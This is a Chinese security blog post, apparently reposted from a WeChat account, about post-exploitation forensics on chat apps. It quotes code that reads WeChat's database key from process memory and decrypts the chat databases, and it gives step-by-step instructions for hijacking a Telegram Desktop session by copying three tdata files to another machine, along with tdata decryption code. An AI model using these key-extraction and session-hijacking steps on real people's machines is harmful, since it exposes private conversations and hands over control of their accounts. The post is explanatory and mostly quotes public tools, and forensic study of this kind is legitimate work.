最近工作中遇到许多取证工作,有相关部门人员咨询相关技术问题,那么,借此机会,今天麋鹿带大家了解一下解密wx聊天记录,以及劫持tg账号,顺便浅析一下原理
先聊微x
如何获取微x的key
贴一个代码,源自此项目
https://github.com/xaoyaoo/PyWxDump
麋鹿摘选了部分关键代码来探讨如何获取wxid key这些
# 读取内存中的字符串(非key部分)
def get_info_without_key(h_process, address, n_size=64):
array = ctypes.create_string_buffer(n_size)
if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"
array = bytes(array).split(b"x00")[0] if b"x00" in array else bytes(array)
text = array.decode('utf-8', errors='ignore')
return text.strip() if text.strip() != "" else "None"
def get_info_wxid(h_process, address, n_size=32, address_len=8):
array = ctypes.create_string_buffer(address_len)
if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
wxid = get_info_without_key(h_process, address, n_size)
if not wxid.startswith("wxid_"): wxid = "None"
return wxid
# 读取内存中的key
def get_key(h_process, address, address_len=8):
array = ctypes.create_string_buffer(address_len)
if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
key = ctypes.create_string_buffer(32)
if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"
key_string = bytes(key).hex()
return key_string
# 读取信息(account,mobile,name,mail,wxid,key)
def read_info(version_list):
wechat_process = []
result = []
for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):
if process.name() == 'WeChat.exe':
wechat_process.append(process)
if len(wechat_process) == 0:
return "[-] WeChat No Run"
for process in wechat_process:
tmp_rd = {}
tmp_rd['pid'] = process.pid
tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())
bias_list = version_list.get(tmp_rd['version'], None)
if not isinstance(bias_list, list):
return f"[-] WeChat Current Version {tmp_rd['version']} Is Not Supported"
wechat_base_address = 0
for module in process.memory_maps(grouped=False):
if module.path and 'WeChatWin.dll' in module.path:
wechat_base_address = int(module.addr, 16)
break
if wechat_base_address == 0:
return f"[-] WeChat WeChatWin.dll Not Found"
Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
account__baseaddr = wechat_base_address + bias_list[1]
tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"
result.append(tmp_rd)
return result
运行就可以得到key
AUTUMN LEAVES
获取key的原理
现在开始分析一下上面代码的原理
首先读取微x版本然后获得该版本的偏移地址(各版本偏移地址网上一大堆,上面那款工具里也自带 如下../version_list.json)
"3.9.2.23": [
50320784,
50321712,
50320640,
38986104,
50321676,
50592864
],
举个例子,要获取account字符(也就是修改后自定义的id,比如我的是i_still_be_milu)是如下过程
read_info(version_list)函数
1.用 psutil.process_iter
遍历所有正在运行的进程,并将所有进程的名称、可执行文件路径、进程ID以及命令行信息传入process
对象
2.检查当前进程的名称是否为 ‘WeChat.exe’,也就是找wx进程,所以获取key是需要该机器登录着微x
if process.name() == 'WeChat.exe':
3.把WeChat微x进程的 PID存储到 tmp_rd
字典
tmp_rd['pid'] = process.pid
4.获取与当前 WeChat 进程版本对应的偏移量列表,还记得上面说到的那个记录微x各版本偏移地址的json文件吗,就是在这里读取到对应的偏移地址
bias_list = version_list.get(tmp_rd['version'], None)
5.查看是否包含WeChatWin.dll模块
if module.path and 'WeChatWin.dll' in module.path:
6.如果找到WeChatWin.dll,使用 ctypes 库调用 Windows 的 kernel32.dll 中的 OpenProcess 函数,打开该进程相关联的句柄,接着读微x进程的内存
Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
参数 0x1F0FFF 是 PROCESS_ALL_ACCESS,表示请求所有可能的访问权限;False 表示句柄不会被继承;process.pid 是当前 WeChat 进程的 PID
7.通过将wechat_base_address
与bias_list[1]
相加来获取微x进程的account
信息的内存地址
account__baseaddr = wechat_base_address + bias_list[1]
8.用前面获取的句柄 Handle 和基址传入get_info_without_key函数读取微x内存中的数据
tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"
如果对应的偏移量为0,则表示该信息不存在,返回 "None"。
进入get_info_without_key函数
9.创建一个字符串缓冲区,用于存储从进程中读取的数据。
调用 Windows API 函数 ReadProcessMemory
,从进程地址 address
中读取相应数据赋值到 array
。如果读取失败,则返回 “None”。
if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"
10.然后解码成utf-8并去掉字符串两端的空白字符,最后得到array,也就是account的值
get_info_wxid函数和without函数功能大同小异,不重新解读
只说一点,windows下是地址是小端序,所以用int.from_bytes将字节数组逆序排列并转换为整数类型
至此,流程一目了然,下一步:
AUTUMN LEAVES
如何解密数据库
1.首先把刚才在获取到的key保存成如下格式
每两个字符前加一个0x,并用”,”分割开,该文件重命名为DBPass.Bin
2.打开聊天记录目录下的MSG文件夹中找到MicroMsg.db文件
3.在上一步的文件夹中找到Multi目录,在Multi目录找到MSG0.db文件
4.把上面三个文件传到我们的机器,放到一个目录,记为A目录
5.在解密的机器下载javafx-sdk-18.0.2和java环境(本机jdk11)
这里记javafx-sdk-18.0.2lib的目录为B
记jdk-11.0.2bin目录为C
6.在C目录,也就是jdk-11.0.2bin目录运行下面命令
javaw.exe --module-path "B路径" --add-modules=javafx.base --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.graphics --add-modules=javafx.media --add-modules=javafx.swing --add-modules=javafx.web -jar chatViewTool.jar
解密工具就运行起来了
然后再1和2处都选择A目录,先1后2
至此,如下图,解密完成
翻一翻有可能找到有用信息
解密数据库原理
还记得聊天记录目录下的那些.db文件吗,毫无疑问这些都是加密过的SQLite数据库文件(sqlite3),那么该如何解密这个文件呢,还是像以往一样,麋鹿节选一段代码,依然选自本文开头的那个github项目
# 通过密钥解密数据库
def decrypt(key: str, db_path, out_path):
if not os.path.exists(db_path):
return f"[-] db_path:'{db_path}' File not found!"
if not os.path.exists(os.path.dirname(out_path)):
return f"[-] out_path:'{out_path}' File not found!"
if len(key) != 64:
return f"[-] key:'{key}' Error!"
password = bytes.fromhex(key.strip())
with open(db_path, "rb") as file:
blist = file.read()
salt = blist[:16]
byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])
mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)
hash_mac.update(b'x01x00x00x00')
if hash_mac.digest() != first[-32:-12]:
return f"[-] Password Error! (key:'{key}'; db_path:'{db_path}'; out_path:'{out_path}' )"
newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]
with open(out_path, "wb") as deFile:
deFile.write(SQLITE_FILE_HEADER.encode())
t = AES.new(byteKey, AES.MODE_CBC, first[-48:-32])
decrypted = t.decrypt(first[:-48])
deFile.write(decrypted)
deFile.write(first[-48:])
for i in newblist:
t = AES.new(byteKey, AES.MODE_CBC, i[-48:-32])
decrypted = t.decrypt(i[:-48])
deFile.write(decrypted)
deFile.write(i[-48:])
return [True, db_path, out_path, key]
def batch_decrypt(key: str, db_path: Union[str, List[str]], out_path: str):
if not isinstance(key, str) or not isinstance(out_path, str) or not os.path.exists(out_path) or len(key) != 64:
return f"[-] (key:'{key}' or out_path:'{out_path}') Error!"
process_list = []
if isinstance(db_path, str):
if not os.path.exists(db_path):
return f"[-] db_path:'{db_path}' not found!"
if os.path.isfile(db_path):
inpath = db_path
outpath = os.path.join(out_path, 'de_' + os.path.basename(db_path))
process_list.append([key, inpath, outpath])
elif os.path.isdir(db_path):
for root, dirs, files in os.walk(db_path):
for file in files:
inpath = os.path.join(root, file)
rel = os.path.relpath(root, db_path)
outpath = os.path.join(out_path, rel, 'de_' + file)
if not os.path.exists(os.path.dirname(outpath)):
os.makedirs(os.path.dirname(outpath))
process_list.append([key, inpath, outpath])
else:
return f"[-] db_path:'{db_path}' Error "
elif isinstance(db_path, list):
rt_path = os.path.commonprefix(db_path)
if not os.path.exists(rt_path):
rt_path = os.path.dirname(rt_path)
for inpath in db_path:
if not os.path.exists(inpath):
return f"[-] db_path:'{db_path}' not found!"
inpath = os.path.normpath(inpath)
rel = os.path.relpath(os.path.dirname(inpath), rt_path)
outpath = os.path.join(out_path, rel, 'de_' + os.path.basename(inpath))
if not os.path.exists(os.path.dirname(outpath)):
os.makedirs(os.path.dirname(outpath))
process_list.append([key, inpath, outpath])
else:
return f"[-] db_path:'{db_path}' Error "
result = []
for i in process_list:
result.append(decrypt(*i)) # 解密
# 删除空文件夹
for root, dirs, files in os.walk(out_path, topdown=False):
for dir in dirs:
if not os.listdir(os.path.join(root, dir)):
os.rmdir(os.path.join(root, dir))
return result
该代码核心在于decrypt()函数,故只解读此函数
提前说几个知识点,希望有助于读者理解下文
1.微信用的加密算法是256位的AES-CBC
2.数据库的默认的页大小是4096字节即4KB
3. 每一个数据库文件的开头16字节都保存了一段唯一且随机的盐值,作为HMAC的验证和数据的解密
4.加密文件的每一页都存有着消息认证码,算法使用的是HMAC-SHA1
5.用来计算HMAC的key与解密的key是不同的,解密用的密钥是主密钥和之前提到的16字节的盐值变化得到的
decrypt()解密函数
1.接受三个参数:密钥(字符串类型)、数据库路径(字符串类型)和输出路径(字符串类型)。
def decrypt(key: str, db_path, out_path):
2.前几行都是检测传入的那两个路径和key长度(64位)是否正确,跳过
将key转换为字节串。key.strip()是移除密钥字符串两端的空白字符。
password = bytes.fromhex(key.strip())
3.以二进制模式打开数据库文件,将整个数据库文件读取到一个字节串blist,并从字节串中提取前16个字节作为盐值(计为A)
with open(db_path, "rb") as file:
blist = file.read()
salt = blist[:16]
4.使用密码(key)、盐值(A)和DEFAULT_ITER参数(前面声明过)来生成一个密钥。这里使用了SHA-1哈希函数和默认的迭代次数和密钥大小
byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)
5,下面几行用于计算用于验证数据库完整性的MAC(消息认证码)。这里使用了SHA-1哈希函数和HMAC(带密钥的哈希算法)。如果计算出的HMAC与存储在数据库中的HMAC不匹配,则返回一个错误
过程简单一点来说,就是生成一个新的盐值(记为B),用B key和DEFAULT_ITE生成一个新密钥,然后用计算出的HMAC是否与存储在数据库中的HMAC相匹配
6.分割blist
newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]
7.用AES加密算法和CBC模式创建一个新的加密器,使用前面生成的密钥作为初始化向量,然后解密,写入文件
decrypted = t.decrypt(first[:-48])
deFile.write(decrypted)
8.重复上面过程,解密每一个块,结束
限于本文篇幅,以及为了增加文章可读性,麋鹿在解密的过程中省略了一些的细节,毕竟这东西实在是枯燥无味,麋鹿连sqlite3.connect这些函数都未做介绍,感兴趣的读者可以自己去读一下该项目的源码,最后,附上几个吾私以为不错的工具and文章
https://www.52pojie.cn/thread-1084703-1-1.html
https://github.com/x1hy9/WeChatUserDB
https://github.com/HackerDev-Felix/WechatDecrypt/blob/main/wechat.cpp
https://www.zetetic.net/sqlcipher/design/
再聊tg
tg目录结构
tg用户数据存放在安装目录下的tdata文件夹内。
一个有效的Telegram登录用户的目录结构如下:
形象一点讲,就是下面这个样子
其中,重点说一下这几个文件
-
tdata/key_datas保存了解密文件的密钥
localKey
-
tdata/D877F783D5D3EF8Cs保存了与云端通信的主密钥和用户的userId
-
tdata/D877F783D5D3EF8C/map保存了用户的基本信息,如用户id,头像,姓名,注册电话,上次在线时间
-
key_datas保存了解密其他文件的主密钥
localKey
认证和加密流程
telegram所使用的mproto通信协议是自己开发的,不过多解读
对文件和消息进行加密则用的是AES-IGE模式
Session劫持
因为tg是支持多端登录的,所以能通过迁移tdata的方法来保持session
如果对方聊天记录特别多,那么复制整个tdata文件夹的这个办法实在是过于臃肿局限,所以一般情况只需要复制下面三个文件即可达到劫持目的
-
tdata/key_datas
-
tdata/D877F783D5D3EF8Cs
-
tdata/D877F783D5D3EF8C/map
如上图所示,把这三个文件(登录tg的A机器里)复制到另外一台机器(B)对应目录以后,在B机器运行tg程序即可劫持,可以正常收到消息
还有一种情况,如果对方机器上登录过多个不同账号
对应文件名按如下顺序生成
D877F783D5D3EF8C
A7FDF864FBC10B77
F8806DD0C461824F
C2B05980D9127787
0CA814316818D8F6
一些重点
-
如果想两台机器同时登录这个被劫持的tg号,需要在账号本人的机器上挂代理,要不会掉
-
如果tg开启了两步验证,需要知道密码
加解密原理分析
https://www.ifmobi.com/telegram/1150.html
解密过程
先用sha512(salt + passcode + salt)生成hash值
接下来再调用pbkdf2_hmac函数,将hash和salt作为输入参数,进行重复计算后得到最终的导出密钥passcode_key,然后带入decrypt_local解出local_key最后用local_key去解密其他文件
(只截取部分关键代码)
class TdataReader:
DEFAULT_DATANAME = 'data'
def __init__(self, base_path: str, dataname: str = None):
self._base_path = base_path
self._dataname = dataname or TdataReader.DEFAULT_DATANAME
def read(self, passcode: str = None) -> ParsedTdata:
parsed_tdata = ParsedTdata()
parsed_tdata.settings = self.read_settings()
local_key, account_indexes = self.read_key_data(passcode)
accounts = {}
for account_index in account_indexes:
account_reader = AccountReader(self._base_path, account_index, self._dataname)
accounts[account_index] = account_reader.read(local_key)
parsed_tdata.accounts = accounts
return parsed_tdata
def read_key_data(self, passcode: str = None) -> Tuple[bytes, List[int]]:
if passcode is None:
passcode = ''
key_data_tdf = read_tdf_file(self._path(self._key_data_name()))
local_key, account_indexes_data = decrypt_key_data_tdf(passcode.encode(), key_data_tdf)
account_indexes, _ = read_key_data_accounts(BytesIO(account_indexes_data))
return local_key, account_indexes
def create_local_key(passcode: bytes, salt: bytes) -> bytes:
if passcode:
iterations = kStrongIterationsCount
else:
iterations = 1
password = hashlib.sha512(salt + passcode + salt).digest()
return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)
def create_legacy_local_key(passcode: bytes, salt: bytes) -> bytes:
if passcode:
iterations = LocalEncryptIterCount
else:
iterations = LocalEncryptNoPwdIterCount
return hashlib.pbkdf2_hmac('sha1', passcode, salt, iterations, 256)
def decrypt_key_data_tdf(passcode: bytes, key_data_tdf: RawTdfFile):
stream = BytesIO(key_data_tdf.encrypted_data)
salt = read_qt_byte_array(stream)
key_encrypted = read_qt_byte_array(stream)
info_encrypted = read_qt_byte_array(stream)
passcode_key = create_local_key(passcode, salt)
local_key = decrypt_local(key_encrypted, passcode_key)
info_decrypted = decrypt_local(info_encrypted, local_key)
return local_key, info_decrypted
def create_local_key(passcode: bytes, salt: bytes) -> bytes:
if passcode:
iterations = kStrongIterationsCount
else:
iterations = 1
password = hashlib.sha512(salt + passcode + salt).digest()
return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)
这里麋鹿实在是想展开好好讲讲,可是这样会文章过于臃肿,而又有很少的读者会有耐心和兴趣读下去,其次实在是浪费麋鹿自身时间,最关键的是我今晚写文章忘了吃饭,现在饿的头晕,不夸张,是真的快饿倒了,现在大脑十分疲惫加上着急去吃饭,怕一时笔误误导读者
故鉴于以上原因,麋鹿这里依然省略部分细节问题,最后放上一个解密工具,有兴趣的读者可以自行阅读代码
https://github.com/ntqbit/tdesktop-decrypter
欢迎师傅们添加麋鹿微信一起探讨学习(i_still_be_milu)
原文始发于微信公众号(麋鹿安全):浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理